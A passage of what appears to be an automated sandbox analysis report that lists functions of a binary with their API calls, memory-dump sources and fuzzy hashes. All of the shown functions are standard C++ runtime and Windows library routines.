                                                                      • messages.LIBCPMT ref: 00D939A1
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D939B8
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D939D8
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                      • String ID:
                                                                      • API String ID: 2750803064-0
                                                                      • Opcode ID: 063173feec5bfb2a0cbeff443ac5168151f08ed7957ac57e0bccd390b37ae8d2
                                                                      • Instruction ID: 188ac98054a14f20245d2b984f46c7735c9525aec62f9730b6e864eb017440f6
                                                                      • Opcode Fuzzy Hash: 063173feec5bfb2a0cbeff443ac5168151f08ed7957ac57e0bccd390b37ae8d2
                                                                      • Instruction Fuzzy Hash: 3401C0359002199BCF01EB64D8067AD77B5EF80720F28450AF415AB391EF709F01CBB0
                                                                      Function 00D87934 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D8793B
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87945
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • messages.LIBCPMT ref: 00D8797F
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87996
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D879B6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                      • String ID:
                                                                      • API String ID: 2750803064-0
                                                                      • Opcode ID: 6bae5577ff7e9d7d7d541cff17eab3e8cb9284535df4ef73ff90d73a5bfeb9e5
                                                                      • Instruction ID: f76c417f0bb467667a9867df9a9f0771068dc45e99da8e8d2ab04abca86af269
                                                                      • Opcode Fuzzy Hash: 6bae5577ff7e9d7d7d541cff17eab3e8cb9284535df4ef73ff90d73a5bfeb9e5
                                                                      • Instruction Fuzzy Hash: AE01C0759002199BCF01FB64D9066AE7762EF80720F29440AF418AB391EF70DE018BB1
                                                                      Function 00D93BAA Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D93BB1
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D93BBB
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • moneypunct.LIBCPMT ref: 00D93BF5
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D93C0C
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D93C2C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      • Opcode ID: 28a4059dea216c1adea89cceed3204ab79b9f19c86092d9025a3e03645253d23
                                                                      • Instruction ID: 17a3dd196ee4cf45c755b36ad5bc5fea496c1d65d30925cab7430cc323869202
                                                                      • Opcode Fuzzy Hash: 28a4059dea216c1adea89cceed3204ab79b9f19c86092d9025a3e03645253d23
                                                                      • Instruction Fuzzy Hash: 7B01D23590061ADBCF15FB64D9066AD7762EF80720F28450AF414BB391EF719E01CBB0
                                                                      Function 00D93B15 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D93B1C
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D93B26
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • moneypunct.LIBCPMT ref: 00D93B60
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D93B77
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D93B97
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      • Opcode ID: 1a5b8113fce8457dd36b04e1e5f347961513cc3776f24b71977e551b383bb20c
                                                                      • Instruction ID: 59e437a0598e2b74c297945d83e523a2ab3c1137b1afb8056087aedc94e3e88a
                                                                      • Opcode Fuzzy Hash: 1a5b8113fce8457dd36b04e1e5f347961513cc3776f24b71977e551b383bb20c
                                                                      • Instruction Fuzzy Hash: 8301D235900319DBCF01EB64D8466AEB761EF80728F28400AF418AB391EF749E018BB0
                                                                      Function 00D87CB2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87CB9
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87CC3
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • moneypunct.LIBCPMT ref: 00D87CFD
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87D14
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87D34
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      • Opcode ID: 6c5ef7454abaf6f48e3fb3c2a0778f63295568567c0e7de64baf8f889aec0f2c
                                                                      • Instruction ID: 1b1ec3a39c38571d9b749763d0c2577d00190107020d48a800fef9bc7f46b90c
                                                                      • Opcode Fuzzy Hash: 6c5ef7454abaf6f48e3fb3c2a0778f63295568567c0e7de64baf8f889aec0f2c
                                                                      • Instruction Fuzzy Hash: 5C01C035904619DBCF01FBA4D8066BE7761EF84720F28450AF811AB392EF74DE018BB0
                                                                      Function 00D87C1D Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87C24
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87C2E
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • moneypunct.LIBCPMT ref: 00D87C68
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87C7F
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87C9F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      • Opcode ID: 9c5eedb4ec581912488acb45d8b120c3ace532d5f64fa3add9c56fe82ec0caa8
                                                                      • Instruction ID: 1a6ff1b4a48d82c472da4a746fc2133f008c53121f12dbc7cee9fff8a739b6e0
                                                                      • Opcode Fuzzy Hash: 9c5eedb4ec581912488acb45d8b120c3ace532d5f64fa3add9c56fe82ec0caa8
                                                                      • Instruction Fuzzy Hash: 8A01C0359002198BCB11FB64D9467BEB7A1EF80720F28440AE415AB392EF74DE018BB0
                                                                      Function 00D87DDC Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87DE3
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87DED
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • moneypunct.LIBCPMT ref: 00D87E27
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87E3E
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87E5E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      • Opcode ID: da41b63206619a07376ceb275bd3a4ee498316d8743c251b6cc3a9e06465d66f
                                                                      • Instruction ID: 66466a662fd29b00c2a3fc0739cf230b592ed5d93a123e43632b3768ed1a91d6
                                                                      • Opcode Fuzzy Hash: da41b63206619a07376ceb275bd3a4ee498316d8743c251b6cc3a9e06465d66f
                                                                      • Instruction Fuzzy Hash: 7601C03590461A9BCB12FB64D8466BE7761EF84720F28444AF511AB391EF70DE019BB0
                                                                      Function 00D87D47 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87D4E
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87D58
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • moneypunct.LIBCPMT ref: 00D87D92
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87DA9
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87DC9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      • Opcode ID: fc6ab636518469687e3813aab185f531e376ba4cdd09d9dcc9dee8c6ca560d4f
                                                                      • Instruction ID: 537806a91b399eecb4dcbe6d2b14d5a63ec461f07a72de02db027fbd30ba5d51
                                                                      • Opcode Fuzzy Hash: fc6ab636518469687e3813aab185f531e376ba4cdd09d9dcc9dee8c6ca560d4f
                                                                      • Instruction Fuzzy Hash: 0601D235900619DBCF01FB64D846ABE77A2EF85720F28440AF411AB391EF70DE018BB0
                                                                      Function 00D9782B Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(00DD4AF8,?,?,00D72627,00DD571C,00DBCCC0), ref: 00D97835
                                                                      • LeaveCriticalSection.KERNEL32(00DD4AF8,?,?,00D72627,00DD571C,00DBCCC0), ref: 00D97868
                                                                      • RtlWakeAllConditionVariable.NTDLL ref: 00D978DF
                                                                      • SetEvent.KERNEL32(?,00D72627,00DD571C,00DBCCC0), ref: 00D978E9
                                                                      • ResetEvent.KERNEL32(?,00D72627,00DD571C,00DBCCC0), ref: 00D978F5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                      • String ID:
                                                                      • API String ID: 3916383385-0
                                                                      • Opcode ID: 67b242e90d92818b12f155a8a9c8ae96aa03cc0135f3c8a61803decebbe05be2
                                                                      • Instruction ID: 105bd86fd567aa564ca8177afef34037daa985996d3626f657d3aa367ab22126
                                                                      • Opcode Fuzzy Hash: 67b242e90d92818b12f155a8a9c8ae96aa03cc0135f3c8a61803decebbe05be2
                                                                      • Instruction Fuzzy Hash: 6B013C35A46321DFC715AF18FC48AA83B66FB49711B05416BF842D7324DB705D01DBB8
                                                                      Function 00D76090 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00D760F4
                                                                      • GetLastError.KERNEL32 ref: 00D76190
                                                                        • Part of subcall function 00D71FC0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000000,00DB938D,000000FF,?,80070057,?,?,00000000,00000010,00D71B09,?), ref: 00D72040
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000009,00DCB2DC,00000001,00000000), ref: 00D7614E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryErrorFindLastLibraryLoadResourceSystem
                                                                      • String ID: ntdll.dll
                                                                      • API String ID: 4113295189-2227199552
                                                                      • Opcode ID: ff3479938af2059b77599f79360a3b15d96d83acf269b7d0bb6de73605eab9d2
                                                                      • Instruction ID: 85130e289d82890891376b36ad9ab59f561c7b620d334778679bb819ffe837b2
                                                                      • Opcode Fuzzy Hash: ff3479938af2059b77599f79360a3b15d96d83acf269b7d0bb6de73605eab9d2
                                                                      • Instruction Fuzzy Hash: 58316D716007459BD720DF68CC49BAEB7F9EB54710F14861AE829D72D1FB70A904CB60
                                                                      Function 00D8D2C2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D8D2C9
                                                                        • Part of subcall function 00D86FF9: _Maklocstr.LIBCPMT ref: 00D87019
                                                                        • Part of subcall function 00D86FF9: _Maklocstr.LIBCPMT ref: 00D87036
                                                                        • Part of subcall function 00D86FF9: _Maklocstr.LIBCPMT ref: 00D87053
                                                                        • Part of subcall function 00D86FF9: _Maklocchr.LIBCPMT ref: 00D87065
                                                                        • Part of subcall function 00D86FF9: _Maklocchr.LIBCPMT ref: 00D87078
                                                                      • _Mpunct.LIBCPMT ref: 00D8D356
                                                                      • _Mpunct.LIBCPMT ref: 00D8D370
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                      • String ID: $+xv
                                                                      • API String ID: 2939335142-1686923651
                                                                      • Opcode ID: 66541b2301936265e7ea245760f2da77c3cecf24ca43f37d57499d231400a86e
                                                                      • Instruction ID: 2b4c9874ce7e935b41bb9fac81b4361b3622b2178b90b617e8fa395edcc0a70b
                                                                      • Opcode Fuzzy Hash: 66541b2301936265e7ea245760f2da77c3cecf24ca43f37d57499d231400a86e
                                                                      • Instruction Fuzzy Hash: 7421AEB1904B52AED725EF75849073BBFE8EB09700B04495AE499C7A81E734E601CBB0
                                                                      Function 00D94DF4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Mpunct$H_prolog3
                                                                      • String ID: $+xv
                                                                      • API String ID: 4281374311-1686923651
                                                                      • Opcode ID: e674e2b2d7979da88c2fcf1b9b845126c6bb54aa5a8d5b7af4b213d0bbc3ff67
                                                                      • Instruction ID: ab8a74ef1a43b2a9536b940d9d11738e2904adef0ab8f9423bd9dfd86ab433f2
                                                                      • Opcode Fuzzy Hash: e674e2b2d7979da88c2fcf1b9b845126c6bb54aa5a8d5b7af4b213d0bbc3ff67
                                                                      • Instruction Fuzzy Hash: 0C2181B1904B92AEDB25DF758450B7BBEE8FB09710F04455AE459C7A42D734E602CBB0
                                                                      Function 00D9C012 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D9BFC3,00000000,?,00DD4EA4,?,?,?,00D9C166,00000004,InitializeCriticalSectionEx,00DBF92C,InitializeCriticalSectionEx), ref: 00D9C01F
                                                                      • GetLastError.KERNEL32(?,00D9BFC3,00000000,?,00DD4EA4,?,?,?,00D9C166,00000004,InitializeCriticalSectionEx,00DBF92C,InitializeCriticalSectionEx,00000000,?,00D9BF1D), ref: 00D9C029
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D9C051
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID: api-ms-
                                                                      • API String ID: 3177248105-2084034818
                                                                      • Opcode ID: 05e7ecd61b67dbaf12b989cffa38df8c654a8107347a16a2702d1d6e9a85ce74
                                                                      • Instruction ID: 0a0bce67341cfacc7ecb399943a7a9e4d37a80d60c79cd65ed8cf02dde6fc621
                                                                      • Opcode Fuzzy Hash: 05e7ecd61b67dbaf12b989cffa38df8c654a8107347a16a2702d1d6e9a85ce74
                                                                      • Instruction Fuzzy Hash: 21E01A74294308FBEF202BA2EC06B593B5A9B01B51F244020FA0CE81E0E762A95596F4
                                                                      Function 00D7E350 Relevance: 6.4, APIs: 4, Instructions: 426COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLocal_strcspn
                                                                      • String ID:
                                                                      • API String ID: 2585785616-0
                                                                      • Opcode ID: b5add647bb4d0a27c5a70c829892a051f0c827505ad1a32ef9fd8e0573ae0d0b
                                                                      • Instruction ID: 6c62c14f56d8b38c7154b02ecd233161ecf2f3850cc32332f9863a080eeb30cc
                                                                      • Opcode Fuzzy Hash: b5add647bb4d0a27c5a70c829892a051f0c827505ad1a32ef9fd8e0573ae0d0b
                                                                      • Instruction Fuzzy Hash: 8EF13775A00249DFDF15CFA8C984AEEBBB6FF48304F148169E819EB251E731E945CB60
                                                                      Function 00DB738B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetConsoleOutputCP.KERNEL32(862265DA,?,00000000,?), ref: 00DB73EE
                                                                        • Part of subcall function 00DB002B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00DAC527,?,00000000,-00000008), ref: 00DB00D7
                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DB7649
                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00DB7691
                                                                      • GetLastError.KERNEL32 ref: 00DB7734
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                      • String ID:
                                                                      • API String ID: 2112829910-0
                                                                      • Opcode ID: 52febe46b16e39be5e9a1a0b7cabde91443f93228eb48f37872e2abe919af76a
                                                                      • Instruction ID: f69ab6bb1443ba84798129bcf24baa77638ce4b43eb2c248cf8142f7b61db76a
